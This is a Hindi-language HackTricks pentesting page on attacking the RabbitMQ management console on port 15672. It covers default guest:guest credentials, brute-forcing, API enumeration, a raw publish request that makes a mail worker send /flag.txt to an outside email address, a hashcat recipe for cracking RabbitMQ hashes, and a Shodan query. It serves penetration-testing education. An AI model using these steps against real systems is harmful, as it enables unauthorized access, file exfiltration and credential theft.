hacktricks/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md

2.8 KiB

15672 - Pentesting RabbitMQ Management

{{#include ../banners/hacktricks-training.md}}

Basic Information

आप RabbitMQ के बारे में अधिक जान सकते हैं 5671,5672 - Pentesting AMQP
इस पोर्ट पर आप RabbitMQ प्रबंधन वेब कंसोल पा सकते हैं यदि प्रबंधन प्लगइन सक्षम है।
मुख्य पृष्ठ ऐसा दिखना चाहिए:

Enumeration

डिफ़ॉल्ट क्रेडेंशियल "guest":"guest" हैं। यदि ये काम नहीं कर रहे हैं, तो आप लॉगिन के लिए ब्रूट-फोर्स करने की कोशिश कर सकते हैं।

इस मॉड्यूल को मैन्युअल रूप से शुरू करने के लिए आपको निष्पादित करने की आवश्यकता है:

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

एक बार जब आप सही तरीके से प्रमाणित हो जाते हैं, तो आप प्रशासन कंसोल देखेंगे:

इसके अलावा, यदि आपके पास मान्य क्रेडेंशियल्स हैं, तो आप http://localhost:15672/api/connections की जानकारी को दिलचस्प पाएंगे।

यह भी ध्यान दें कि आप इस सेवा के API का उपयोग करके क्यू के अंदर डेटा प्रकाशित करना संभव है, जैसे कि एक अनुरोध:

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

हैश क्रैकिंग

echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist

Shodan

  • port:15672 http

{{#include ../banners/hacktricks-training.md}}